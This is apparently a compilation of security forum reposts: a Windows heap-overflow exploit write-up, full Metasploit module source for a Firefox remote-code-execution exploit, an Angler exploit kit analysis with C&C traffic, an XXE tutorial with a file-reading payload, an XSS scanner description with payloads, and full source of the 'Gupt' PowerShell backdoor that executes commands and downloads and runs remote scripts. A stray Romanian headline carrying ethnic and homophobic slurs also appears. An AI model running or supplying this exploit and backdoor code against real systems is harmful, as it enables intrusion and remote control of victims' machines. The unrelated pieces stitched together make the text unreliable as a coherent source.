0x0018F550 When the overwrite is done the function will return normally to its caller , and all we have to do now is wait for an exception to occur . An exception will occur after a dozen of instructions as the metadata is badly corrupted. The original handler will be executed but it will fail to handle the access violation and then our fake handler will be called which is the shellcode . Making the exploit work : Now all we need to do is calculate the length between the 1st character of the name and the flink and blink pointers , and then insert our pointers in the POC. Inserting the shellcode : The space between the starting address of the buffer and the heap overwritten metadata is not so large , so it's best to put an unconditional jump at the start of our buffer to jump past the overwritten flink and blink pointers and then put the shellcode just after the pointers. As we can calculate the length , this won't cause any problem. Final exploit here : [Perl] ZipItFast Heap Overflow - Pastebin.com I chose a bind shellcode , which opens a connection to (0.0.0.0:4444). Let's try opening the ZIP file using ZipItFast and then check "netstat -an | find "4444" : Bingo ! A Fix for this vulnerability ?? The method I stated before which consists on allocating the block based on the filename length from the ZIP headers can be valid only to fix the vulnerability in this case , but what if the attackers were also able to cause an overflow elsewhere in the software ? The best way to fix the bug is that : when a block is about to be allocated and it's about to be unlinked from the Freelist the first thing that must be done is checking the validity of the doubly linked list , to do so : safe unlinking must be performed and which was introduced in later versions of Windows. Safe unlinking is done the following way : if ( entry->flink->blink != entry->blink->flink || entry->blink->flink != entry){ //Fail , Freelist corrupted , exit process } else { //Unlink then return the block to the caller } Let's see how safe unlinking is implemented under Windows 7 : The function is that we'll look at is : RtlAllocateHeap exported by ntdll Even if this method looks secure , there is some research published online that provides weaknesses of this technique and how can it be bypassed. I also made sure to implement this technique in my custom heap manager (Line 86) , link above. I hope that you've enjoyed reading this paper . See you again soon , Souhail Hammou. Sursa: Reverse Engineering 0x4 Fun: Windows Heap Overflow Exploitation

[h=3]Windows Internals - Quantum end context switching[/h] Hello, Lately I decided to start sharing the notes I gather , almost daily , while reverse engineering and studying Windows. As I focused in the last couple of days on studying context switching , I was able to decompile the most involved functions and study them alongside with noting the important stuff. The result of this whole process was a flowchart. Before getting to the flowchart let's start by putting ourselves in the main plot : As you might know, each thread runs for a period of time before another thread is scheduled to run, excluding the cases where the thread is preempted ,entering a wait state or terminated. This time period is called a quantum. Everytime a clock interval ends (mostly 15 ms) the system clock issues an interrupt.While dispatching the interrupt, the thread current cycle count is verified against its cycle count target (quantum target) to see if it has reached or exceeded its quantum so the context would be switched the next thread scheduled to run. Note that a context-switch in Windows doesn't happen only when a thread has exceeded its quantum, it also happens when a thread enters a wait state or when a higher priority thread is ready to run and thus preempts the current thread. As it will take some time to organize my detailed notes and share them here as an article (maybe for later),consider the previous explanation as a small introduction into the topic. However ,the flowchart goes through the details involved in quantum end context switching. Please consider downloading the pdf to be able to zoom as much as you like under your PDF reader because GoogleDocs doesn't provide enough zooming functionality to read the chart. Preview (unreadable) : PDF full size Download :GoogleDocs Link P.S : - As always , this article is based is on : Windows 7 32-bit - Note that details concerning the routine that does the context switching (SwapContext) aren't included in the chart and are left it for a next post. See you again soon. -Souhail. Sursa: Reverse Engineering 0x4 Fun: Windows Internals - Quantum end context switching

Firefox WebIDL Privileged Javascript Injection Authored by joev, Marius Mlynski | Site metasploit.com This exploit gains remote code execution on Firefox 22-27 by abusing two separate privilege escalation vulnerabilities in Firefox's Javascript APIs. ## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rex/exploitation/jsobfu' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::BrowserExploitServer include Msf::Exploit::Remote::BrowserAutopwn include Msf::Exploit::Remote::FirefoxPrivilegeEscalation autopwn_info({ :ua_name => HttpClients::FF, :ua_maxver => "22.0", :ua_maxver => "27.0", :javascript => true, :rank => ExcellentRanking }) def initialize(info = {}) super(update_info(info, 'Name' => 'Firefox WebIDL Privileged Javascript Injection', 'Description' => %q{ This exploit gains remote code execution on Firefox 22-27 by abusing two separate privilege escalation vulnerabilities in Firefox's Javascript APIs. }, 'License' => MSF_LICENSE, 'Author' => [ 'Marius Mlynski', # discovery and pwn2own exploit 'joev' # metasploit module ], 'DisclosureDate' => "Mar 17 2014", 'References' => [ ['CVE', '2014-1510'], # open chrome:// url in iframe ['CVE', '2014-1511'] # bypass popup blocker to load bare ChromeWindow ], 'Targets' => [ [ 'Universal (Javascript XPCOM Shell)', { 'Platform' => 'firefox', 'Arch' => ARCH_FIREFOX } ], [ 'Native Payload', { 'Platform' => %w{ java linux osx solaris win }, 'Arch' => ARCH_ALL } ] ], 'DefaultTarget' => 0, 'BrowserRequirements' => { :source => 'script', :ua_name => HttpClients::FF, :ua_ver => lambda { |ver| ver.to_i.between?(22, 27) } } )) register_options([ OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>.", "" ]) ], self.class) end def on_request_exploit(cli, request, target_info) send_response_html(cli, generate_html(target_info)) end def generate_html(target_info) key = Rex::Text.rand_text_alpha(5 + rand(12)) frame = Rex::Text.rand_text_alpha(5 + rand(12)) r = Rex::Text.rand_text_alpha(5 + rand(12)) opts = { key => run_payload } # defined in FirefoxPrivilegeEscalation mixin data_uri = "data:text/html,<script>c = new mozRTCPeerConnection;c.createOffer(function()"+ "{},function(){top.vvv=window.open('chrome://browser/content/browser.xul', "+ "'#{r}', 'chrome,top=-9999px,left=-9999px,height=100px,width=100px');})<\/script>" js = Rex::Exploitation::JSObfu.new(%Q| var opts = #{JSON.unparse(opts)}; var key = opts['#{key}']; // Load the chrome-privileged browser XUL script into an iframe var c = new mozRTCPeerConnection; c.createOffer(function(){},function(){ window.open('chrome://browser/content/browser.xul', '#{frame}'); step1(); }); // Inject a data: URI into an internal frame inside of the browser // XUL script to pop open a new window with the chrome flag to prevent // the new window from being wrapped with browser XUL; function step1() { var clear = setInterval(function(){ // throws until frames[0].frames[2] is available (when chrome:// iframe loads) frames[0].frames[2].location; // we base64 this to avoid the script tag screwing up things when obfuscated frames[0].frames[2].location=window.atob('#{Rex::Text.encode_base64(data_uri)}'); clearInterval(clear); setTimeout(step2, 100); },10); } // Step 2: load the chrome-level window up with a data URI, which // gives us same-origin. Make sure to load an "<iframe mozBrowser>" // into the frame, since that will respond to our messageManager // (this is important later) function step2() { var clear = setInterval(function(){ top.vvv.location = 'data:text/html,<html><body><iframe mozBrowser '+ 'src="about:blank"></iframe></body></html>'; clearInterval(clear); setTimeout(step3, 100); }, 10); } function step3() { var clear = setInterval(function(){ if (!frames[0]) return; // will throw until the frame is accessible top.vvv.messageManager.loadFrameScript('data:,'+key, false); clearInterval(clear); setTimeout(function(){top.vvv.close();}, 100); }, 10); } |) js.obfuscate %Q| <!doctype html> <html> <body> <iframe id='#{frame}' name='#{frame}' style='position:absolute;left:-9999999px;height:1px;width:1px;'> </iframe> <script> #{js} </script> #{datastore['CONTENT']} </body> </html> | end end Sursa: Firefox WebIDL Privileged Javascript Injection ? Packet Storm

[h=2]folly/FBvector.h[/h] Simply replacing std::vector with folly::fbvector (after having included the folly/FBVector.h header file) will improve the performance of your C++ code using vectors with common coding patterns. The improvements are always non-negative, almost always measurable, frequently significant, sometimes dramatic, and occasionally spectacular. [h=3]Sample[/h] folly::fbvector<int> numbers({0, 1, 2, 3});numbers.reserve(10); for (int i = 4; i < 10; i++) { numbers.push_back(i * 2); } assert(numbers[6] == 12); [h=3]Motivation[/h] std::vector is the stalwart abstraction many use for dynamically-allocated arrays in C++. It is also the best known and most used of all containers. It may therefore seem a surprise that std::vector leaves important - and sometimes vital - efficiency opportunities on the table. This document explains how our own drop-in abstraction fbvector improves key performance aspects of std::vector. Refer to folly/test/FBVectorTest.cpp for a few benchmarks.Sursa: https://github.com/facebook/folly/blob/master/folly/docs/FBVector.md

HOW (AND WHY) WE DEFEATED DIRCRYPT DirCrypt is a particularly nasty variant of ransomware. In addition to encrypting most of the user’s files and demanding ransom for their decryption, the malware stays resident in the system, and immediately encrypts any new file which is created or saved. Therefore, the user is completely prevented from using the computer normally. The normal advice to victims of ransomware is to recover files from some previous backup. If there isn’t a backup, the victims are given the option of either accepting the loss of their data—or paying the attacker. However, Check Point’s Malware Research Team has found that in the case of DirCrypt, victims of the malware can recover almost all of their data, due to several weaknesses in the way the malware implements its crypto functionality. Download: http://www.checkpoint.com/download/public-files/TCC_WP_Hacking_The_Hacker.pdf

HowTo: Debug Android APKs with Eclipse and DDMS Source: http://blog.dornea.nu/2014/08/21/howto-debug-android-apks-with-eclipse-and-ddms/ 1. Download apktool git clone git://github.com/iBotPeaches/Apktool.git find . -name "apktool-cli.jar" cp ./brut.apktool/apktool-cli/build/libs/apktool-cli.jar /tmp 2. Dump APK java -jar /tmp/apktool-cli.jar d -d FakeBanker.apk -o source 3. Make Application to debug mode If you want to do it manually open the AndroidManifest.xml file and search for the application tag. Then insert new attribute android:debuggable='true' like I did: 4. Build new app # java -jar /tmp/apktool-cli.jar b -d source FakeBanker.Debug.apk 5. Unzip debug application and make jar file unzip FakeBanker.Debug.apk -d unpacked cd unpacked # dex2jar classes.dex -> classes-dex2jar.jar 6. Using jd-gui for save all source of jar 7. Sign the application git clone https://github.com/appium/sign # java -jar sign/dist/signapk.jar sign/testkey.x509.pem sign/testkey.pk8 FakeBanker.Debug.apk FakeBanker.Debug.Signed.apk 8. Install Application to your mobile # adb devices -l # adb install FakeBanker.Debug.Signed.apk For add some source into app # mkdir source/src # unzip classes-dex2jar.src.zip -d source/src Debug Settings Go to Device Settings -> Select debug app. Also make sure you have Wait for debugger Create new Java project in Eclipse 1. create a new Java project and use source as the location of the project 2. Add src folder to build path 3. Check project properties 4. Set breakpoints 5. And run (Switching to debug mode). Sursa: HowTo: Debug Android APKs with Eclipse and DDMS | Offensive Security Blog V2.0

Angler EK : now capable of "fileless" infection (memory malware) [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Matrix - Agent Jackson avoiding bullets[/TD] [/TR] [/TABLE] (First edition : I asked help to study this - Hopefully, more technical details to come soon) Few days ago I spotted a new pattern in some Angler EK threads : [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]New pattern in a Vawtrak Thread from Angler EK Fired : CVE-2013-2551 - 2014-08-28[/TD] [/TR] [/TABLE] [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]New pattern in another Vawtrak Thread from Angler EK Fired : CVE-2014-0515 - 2014-08-29[/TD] [/TR] [/TABLE] GET http://rwvs30r2zq.akdnbfb .com/qpbv8tg4ee/count?b=1 HTTP/1.1 Accept: */* Referer: http://rwvs30r2zq.akdnbfb .com/qpbv8tg4ee Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Accept-Encoding: gzip, deflate Host: rwvs30r2zq.akdnbfb.com Connection: Keep-Alive Wondering what it was and going over different infections paths I spotted only one thread without this "new" count?b. [Note : on the 2014-08-31 count?b appeared on that thread too] [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Angler EK - 2014-08-28 "Memory Malware" thread[/TD] [/TR] [/TABLE] Exploits' hashes were the same as on all other threads but my usual tools were not able to gather the payload and what surprised me more is that HIPS (like Faronics antiexec) were bypassed (note : I tried Malwarebytes AntiExploit and it was able to spot the ROP and Stack pivoting) I spent some time to figure out what was happening here : Angler EK is now able to infect an host without writing the malware on the drive (it's injected directly in the process running the exploited plugin) [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center] Angler EK (no landing on this screen, CVE-2014-0515 fired) and Call back from the malware injected in Internet Explorer 2nd Stage drop : 275c5f650261e80d864faf7cc6b70774 injecting itself to explorer and then gathering Necurs on the same C&C (e.g. : be84c4689912d5689283b4b7efcaf8f2 - 2014-08-28 , b0e3e860a2dc62cb40fd6ef897ad592b 2014-08-29 , 5830dfde30873176d05604677bab6bd9 2014-08-30) [/TD] [TD=class: tr-caption][/TD] [TD=class: tr-caption][/TD] [/TR] [/TABLE] Malware call back in https to koqpisea.in : 217.23.3.204 49981 | 217.23.0.0/20 | WORLDSTREAM | NL | WORLDSTREAM.NL | WORLDSTREAM Call for 2nd Stage payload looks like : POST https://koqpisea.in/ HTTP/1.1 Host: koqpisea.in Content-Length: 94 Connection: Keep-Alive Cache-Control: no-cache {"protocolVersion":1,"buildId":1049,"id":"35d1754a1c4672f2","tags":[{"type":"dll","64bit":0}]} This feature opens a wide range of possibilities. Aside being a powerful way to bypass AV, an ideal way for one time stealer or loader (Pony, Jolly Roger, Andromeda, Smoke Bot, etc..), it also allows a detailed check of the infected host before being a little more noisy and writing anything on disk. It makes it also difficult to grab the dropper (you have to get it from the memory or from the recorded traffic then decode it). This is a powerful move for the attack side. Additionnal illustrations : [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Injected plugin-container calling C&C after successful "memory malware" infection via Silverlight on Firefox and Windows 7 2014-08-30[/TD] [/TR] [/TABLE] [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Image : Courtesy of Will Metcalf from Emerging Threats Java calling payload then "Memory payload" activity captured by his Cuckoo instance 2014-08-28[/TD] [/TR] [/TABLE] Hopefully more to come soon. Credits: Thanks to Will Metcalf (Emerging Threats) and Mieke Verburgh (Malwarebytes) for help and advices. Files: AnglerEK_MM_2014-08-31 (Fiddlers + C&C calls - Owncloud) If you want to play with Volatility or whatever, here is the memory (Mega) of a VM when IE was injected and calling C&C (IE pid : 860) [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Capture of Fiddler just before pausing the VM 2014-08-30[/TD] [/TR] [/TABLE] Sursa: Malware don't need Coffee: Angler EK : now capable of "fileless" infection (memory malware)

XML External Entity Injection For Fun and Maybe Profit Ed_A| August 28, 2014 Ooo injection…or maybe oww injection Source: https://flic.kr/p/5LPRs7 The eXtensible markup language, or XML, is commonly used in applications. XML allows data to be represented in a structured manner and is handled by an XML parser. XML parsers open up new avenues for web attacks including XML Injection, Entity Expansion and the topic of this blog, XML External Entity Injection; but first, some background. SOAP Web Services The Simple Object Access Protocol, or SOAP, is a type of web service. SOAP is standards based. The transport is XML over HTTP in both directions. A standard SOAP request looks like this one available at http://www.webservicex.net/ws/WSDetails.aspx?CATID=2&WSID=9: POST /stockquote.asmx HTTP/1.1 Host: www.webservicex.net Content-Type: text/xml; charset=utf-8 Content-Length: length SOAPAction: "http://www.webserviceX.NET/GetQuote" <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <GetQuote xmlns="http://www.webserviceX.NET/"> <symbol>string</symbol> </GetQuote> </soap:Body> </soap:Envelope> HTTP/1.1 200 OK Content-Type: text/xml; charset=utf-8 Content-Length: length <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <GetQuoteResponse xmlns="http://www.webserviceX.NET/"> <GetQuoteResult>string</GetQuoteResult> </GetQuoteResponse> </soap:Body> </soap:Envelope> A SOAP envelope containing XML is sent to the server via POST, processed by an XML parser, and the server responds with a SOAP envelope containing the response. XXE XML External Entity (XXE) injection vulnerabilities arise because the XML specification allows XML documents to define entities which reference resources external to the document. XML parsers typically support this feature by default, even though it is rarely required by applications during normal usage. XXE Injection is an attack in which an attacker defines an arbitrary entity that is executed by the XML parser if the parser lacks validation checks. Entities are used as abbreviations to represent a repetitive value. External entities can reference files on the parser's filesystem; exploiting this feature may allow retrieval of arbitrary files, or denial of service by causing the server to read from a file such as /dev/random. They can also reference URLs; exploiting this feature may allow port scanning from the XML parser's host, or the retrieval of sensitive web content which is otherwise inaccessible due to network topology and defenses. An attack string would look like: <!DOCTYPE foo [<!ENTITY test SYSTEM "file:///c:/windows/win.ini"> ]> This string is referred to as a DTD or Document Type Declaration. A DTD is simply a mechanism for defining entities. The DOCTYPE declaration “foo” is not important. This can be any arbitrary value. The value “SYSTEM” indicates the file should be read from the location that follows. This string is telling the XML parser to replace references to “&test;” with the contents of C:\Windows\win.ini. This could be any file readable by the account under which the application is running. The defined entity “test” would then be inserted into the normal SOAP message in a value. The full attack payload would resemble: <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE foo [<!ENTITY test SYSTEM "file:///c:/windows/win.ini"> ]> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <GetQuoteResponse xmlns="http://www.webserviceX.NET/"> <GetQuoteResult>&test;</GetQuoteResult> </GetQuoteResponse> </soap:Body> </soap:Envelope> If the service is vulnerable, it should return: HTTP/1.1 200 OK Content-Type: text/xml; charset=utf-8 Content-Length: length <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <GetQuoteResponse xmlns="http://www.webserviceX.NET/"> <GetQuoteResult>; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1 [MCI Extensions.BAK] aif=MPEGVideo aifc=MPEGVideo aiff=MPEGVideo asf=MPEGVideo asx=MPEGVideo au=MPEGVideo m1v=MPEGVideo m3u=MPEGVideo mp2=MPEGVideo mp2v=MPEGVideo mp3=MPEGVideo mpa=MPEGVideo mpe=MPEGVideo mpeg=MPEGVideo mpg=MPEGVideo mpv2=MPEGVideo snd=MPEGVideo wax=MPEGVideo wm=MPEGVideo wma=MPEGVideo wmv=MPEGVideo wmx=MPEGVideo wpl=MPEGVideo wvx=MPEGVideo</GetQuoteResult> </GetQuoteResponse> </soap:Body> </soap:Envelope> This attack is beginning to appear more often despite the fact that the vulnerability has existed for years. In January, Facebook paid one of the largest bounties to date for a XXE vulnerability discovered in OpenID Facebook Pays $33,500 Bounty for Major Code Execution Flaw | Threatpost | The first stop for security news. If you read the article, you will see that XXE can be turned into remote code execution. Intriguing… Fixes Validate user supplied input before passing it to the XML parser for processing. Additionally the parser may be able to disable DTD parsing and/or disable resolution of external entities via configuration options. As always, feel free to reach out to us here at FoD at with any questions via Twitter (@hpappsecurity) or via email (fodsales(at)hp.com). We'd love to hear your questions or comments about our data breaches, identity theft management, and how it affects you. Sursa: XML External Entity Injection For Fun and Maybe Pr... - HP Enterprise Business Community

Penal E spaima tiganilor, dusnamul ungurilor si exterminatorul homosexualilor

Introducing Gupt: A Backdoor which uses Wireless network names for command execution Few weeks back, I was playing with my mobile WiFi hotspot and powershell. Using powershell, I was listing the SSIDs created by the mobile hotspot, wondering if it could be exploited some way? It turned out to be a yes but with some help. Behold, I give you Gupt (which means secret), a powershell backdoor which could execute commands and scripts on a target if a specially crafted SSID is brought into its proximity. Gupt is very small yet powerful ! Like other backdoors, Gupt, a powershell script, has to be executed on the target. This could be done using Powershell Remoting and PsExec (needs crdentials of a user or hashes of built-in Administrator), with an exploit, using client side attacks (I will talk about these at DeepSec), using a Human Interface Device etc. Previous posts on this blog details above methods. Executing Commands Gupt checks all wireless network names for a pattern every 5 seconds, it asks for two parameters, first one, MagicString, is used to identify the SSID which contains commands for it. It needs to be four characters long. For example, if we set MagicString as "op3n", it would compare SSIDs of all available wireless networks if first four characters of any matches "op3n". Gupt needs the network name in a special format. While the first four characters must match MagicString, the 5th character is used to decide if we want it to execute a command or download-execute a powershell script. If the 5th character is 'c', it means that rest of the network name is a command! For example, while looking for Wireless Networks, if Gupt encounters a network with name "op3ncwhoami" it would execute whoami on the target. Simple, isn't it? Lets see it in action.We use the following: PS C:\nishang> . .\Gupt-Backdoor.ps1 PS C:\nishang> Gupt-Backdoor -MagicString op3n -Verbose Great! We executed command on the target without forcing it to connect to the wireless network. Lets have a look at the attacker's SSID/Network name. As we saw, everything after the 'c' is considered a single command. Lets see another example, this time with powershell cmdlet Get-Process. The SSID being "holacget-process" Gupt waits for 10 seconds after executing a command, we can execute more commands by changing the SSID name. Executing Scripts Now, how do we execute a script using Gupt? Since maximum length for an SSID could only be 32 characters (with restrictions on special characters), passing scripts in SSID name is not possible. To achieve script execution, Gupt downloads and executes a script. If the 5th character of SSID is 'u', Gupt looks for the id part of a URL shortened by Google URL shortener. For example, a SSID "op3nunJEuug" would use http://goo.gl/nJEuug to download and execute the script. The script would be executed in memory. The second parameter, Arguments could be used to pass arguments to the downloaded script. Lets see it in action with the Get-Information script from Nishang. We use the following command: PS C:\nishang> . .\Gupt-Backdoor.ps1 PS C:\nishang> Gupt-Backdoor -MagicString op3n -Argument Get-Information -Verbose Attacker's SSID being 'op3nunJEuug' We could also execute Powerpreter module on a target using Gupt the same way, powerpreter would provide much wider functionality. Lets see if we could get a meterpreter session with this. We will use the powershell script generated using msfpayload. And we have a meterpreter. This is how our SSIDs look like. Cool! Here is the full source code. function Gupt-Backdoor { [CmdletBinding()] Param( [Parameter(Position=0, Mandatory = $True)] [String] $MagicString, [Parameter(Position=3, Mandatory = $False)] [String] $Arguments ) #Get list of available Wlan networks while($True) { Write-Verbose "Checking wireless networks for instructions." $networks = Invoke-Expression "netsh wlan show network" $ssid = $networks | Select-String "SSID" $NetworkNames = $ssid -replace ".*:" -replace " " ForEach ($network in $NetworkNames) { #Check if the first four characters of our SSID matches the given MagicString if ($network.Substring(0,4) -match $MagicString.Substring(0,4)) { Write-Verbose "Found a network with instructions!" #If the netowrk SSID contains fifth chracter "u", it means rest of the SSID is a URL if ($network.Substring(4)[0] -eq "u") { Write-Verbose "Downloading the attack script and executing it in memory." $PayloadURL = "http://goo.gl/" + $network.Substring(5) $webclient = New-Object System.Net.WebClient Invoke-Expression $webclient.DownloadString($PayloadURL) if ($Arguments) { Invoke-Expression $Arguments } Start-Sleep -Seconds 10 } elseif ($network.Substring(4)[0] -eq "c") { $cmd = $network.Substring(5) if ($cmd -eq "exit") { break } Write-Verbose "Command `"$cmd`" found. Executing it." Invoke-Expression $cmd Start-Sleep -Seconds 10 } } } Start-Sleep -Seconds 5 } } Gupt waits for 10 seconds after executing a script, we can execute more commands by changing the SSID name. We ccold force Gupt to exit by naming our network, in above case, "op3ncexit". Use cases of Gupt are many like bypassing network traffic monitoring, backdooring a machine completely on an internal network or simply to show off something new to the clients. Gupt is available at github repo of Nishang and would soon be a part of Kautilya too. If you like this post and presently in Europe and/or coming to DeepSec, Vienna, join me for interesting hands-on hacks, concepts and code in my two-day training "Powershell for Penetration Testers". Details here: https://deepsec.net/speaker.html#WSLOT145 Hope you enjoyed this. Please leave comments. Posted by Nikhil SamratAshok Mittal Sursa: Lab of a Penetration Tester: Introducing Gupt: A Backdoor which uses Wireless network names for command execution

XSScrapy: fast, thorough XSS vulnerability spider Posted on August 20, 2014 by Dan McInerney — 7 Comments ? https://github.com/DanMcInerney/xsscrapy Unsatisfied with the current crop of XSS-finding tools, I wrote one myself and am very pleased with the results. I have tested this script against other spidering tools like ZAP, Burp, XSSer, XSSsniper, and others and it has found more vulnerabilities in every case. This tool has scored me dozens of responsible disclosures in major websites including an Alexa Top 10 homepage, major financial institutes, and large security firms’ pages. Even the site of the Certified Ethical Hacker certificate progenitors fell victim although that shouldn’t impress you much if you actually know anything about EC-Council . For the record they did not offer me a discounted CEH. Shame, but thankfully this script has rained rewards upon my head like Bush/Cheney on Halliburton; hundreds of dollars, loot, and Halls of Fame in just a few weeks of bug bounty hunting. I think I’ve had my fill of fun with it so I’d like to publicly release it now. Technically I publicly released it the first day I started on it since it’s been on my github the whole time but judging by the Github traffic graph it’s not exactly the Bieber of security tools. Hopefully more people will find some use for it after this article which will outline it’s logic, usage, and shortcomings. Basic usage Install the prerequisite python libraries, give it a URL, and watch it spider the entire site looking in every nook and cranny for XSS vulnerabilities. apt-get install python-pip git clone https://github.com/DanMcInerney/xsscrapy cd xsscrapy pip install requirements.txt scrapy crawl xsscrapy -a url="http://example.com" To login then scrape: scrapy crawl xsscrapy -a url="http://example.com/login" -a user=my_username -a pw=my_password All vulnerabilities it finds will be places in formatted-vulns.txt. Example output when it finds a vulnerable user agent header: XSS attack vectors xsscrapy will test Referer header (way more common than I thought it would be!) User-Agent header Cookie header (added 8/24/14) Forms, both hidden and explicit URL variables End of the URL, e.g. www.example.com/<script>alert(1)</script> Open redirect XSS, e.g. looking for links where it can inject a value of javascript:prompt(1) XSS attack vectors xsscrapy will not test Other headers Let me know if you know of other headers you’ve seen XSS-exploitable in the wild and I may add checks for them in the script. Persistent XSS’s reflected in pages other than the immediate response page If you can create something like a calendar event with an XSS in it but you can only trigger it by visiting a specific URL that’s different from the immediate response page then this script will miss it. DOM XSS DOM XSS will go untested. CAPTCHA protected forms This should probably go without saying, but captchas will prevent the script from testing forms that are protected by them. AJAX Because Scrapy is not a browser, it will not render javascript so if you’re scanning a site that’s heavily built on AJAX this scraper will not be able to travel to all the available links. I will look into adding this functionality in the future although it is not a simple task. Test strings There are few XSS spiders out there, but the ones that do exist tend to just slam the target with hundreds to thousands of different XSS payloads then look for the exact reflection. This is silly. If < and > are filtered then <img src=x onerror=alert(1)> is going to fail just as hard as <script>alert(1)</script> so I opted for some smart targeting more along the logical lines ZAP uses. 9zqjx When doing the initial testing for reflection points in the source code this is the string that is used. It is short, uses a very rare letter combination, and doesn’t use any HTML characters so that lxml can accurately parse the response without missing it. '"()=<x> This string is useful as it has every character necessary to execute an XSS payload. The “x” between the angle bracket helps prevent false positives that may occur like in some ASP filters that allow < and > but not if there’s any characters between them. '"(){}[]; Embedded javascript injection. The most important character for executing an XSS payload inside embedded javascript is ‘ or ” which are necessary to bust out of the variable that you’re injecting into. The other characters may be necessary to create functional javascript. This attack path is useful because it doesn’t require < or > which are the most commonly filtered characters. JaVAscRIPT:prompt(99) If we find an injection point like: <a href=”INJECTION”> then we don’t need ‘, “, <, or > because we can just use the payload above to trigger the XSS. We add a few capital letters to bypass poorly written regex filters, use prompt rather than alert because alert is also commonly filtered, and use 99 since it doesn’t require quotes, is short, and is not 1 which as you can guess is also filtered regularly. Logic Xsscrapy will start by pulling down the list of disallowed URLs from the site’s robots.txt file to add to the queue then start spidering the site randomly choosing 1 of 6 common user agents. The script is built on top of web spidering library Scrapy which in turn is built on the asynchronous Twisted framework since in Python asynchronosity is simpler, speedier and more stable than threading. You can choose the amount of concurrent requests in settings.py; by default it’s 12. I also chose to use the lxml library for parsing responses since it’s 3-4x as fast as the popular alternative BeautifulSoup. With every URL the script spiders it will send a second request to the URL with the 9zqjx test string as the Referer header and a third request to the URL with /9zqjx tacked onto the end of the URL if there are no variables in the URL in order to see if that’s an injection point as well. It will also analyze the original response for a reflection of the user agent in the code. In order to save memory I have also replaced the original hash-lookup duplicate URL filter stock in Scrapy with a bloom filter. When xsscrapy finds an input vector like a URL variable it will load the value with the test string 9zqjx. Why 9zqjx? Because it has very few hits on Google and is only 5 characters long so it won’t have problems with being too long. The script will analyze the response using lxml+XPaths to figure out if the injection point is inbetween HTML tags like <title>INJECTION</title>, inside an HTML attribute like <input value=”INJECTION”>, or inside embedded javascript like var=’INJECTION’;. Once it’s determined where the injection took place it can figure out which characters are going to be the most important and apply the appropriate XSS test string. It will also figure out if the majority of the HTML attributes are enclosed with ‘ or ” and will apply that fact to its final verdict on what may or may not be vulnerable. Once it’s found a reflection point in the code and chosen 1 of the 3 XSS character strings from the section above it will resend the request with the XSS character string surrounded by 9zqjx, like 9zqjx’”()=<x>9zqjx, then analyze the response from the server. There is a pitfall to this whole method, however. Since we’re injecting HTML characters we can’t use lxml to analyze the response so we must to use regex instead. Ideally we’d use regex for both preprocessing and postprocessing but that would require more time and regex skill than I possess. That being said, I have not yet found an example in the wild where I believe this would have made a difference. Definitely doesn’t mean they don’t exist. This script doesn’t encode its payloads except for form requests. It will perform one request with the unencoded payload and one request with an HTML entity-encoded payload. This may change later, but for now it seems to me at least 95% of XSS vulnerabilities in top sites lack any filtering at all making encoding the payload mostly unnecessary. After the XSS characters string is sent and the response processed using regex xsscrapy will report its finding to the DEBUG output. By default the output of the script is set to DEBUG and will be very verbose. You can change this within xsscrapy/settings.py if you wish. If it doesn’t find anything you’ll see “WARNING: Dropped: No XSS vulns in http://example.com”. It should be noted that redirects are on which means it will scrape some domains that aren’t just part of the original domain you set as the start URL if a domain within the start URL redirects to them. You can disable redirects by uncommenting REDIRECT_ENABLED in xsscrapy/setting.py. Manually testing reported vulnerabilities If you see a hit for a vulnerability in a site, you’ll need to go manually test it. Tools of the trade: Firefox with the extensions HackBar and Tamper Data. Go to formatted-vulns.txt and check the “Type:” field. header: Use Firefox + Tamper Data to edit/create headers and payload the header value. url: Just hit the URL with Firefox and change the parameter seen in “Injection point” to a payload form: Use Firefox + HackBar. Enter the value within the “POST url” field of the xsscrapy report into the top half of HackBar then check the box “Enable Post data” and enter your variable and payload in the bottom box, e.g., var1=”><sVG/OnLoaD=prompt(9)>&var2=<sVG/OnLoaD=prompt(9)> end of url: Use Firefox, go to the URL listed within the xsscrapy report, and add your payload to the end of the URL like example.com/page1/<sVG/OnLoaD=prompt(9)> The “Line:” fields are just there to quickly identify if the vulnerability is a false positive and to see if it’s an HTTP attribute injection or HTML tag injection. Recommended payloads: Attribute injection: 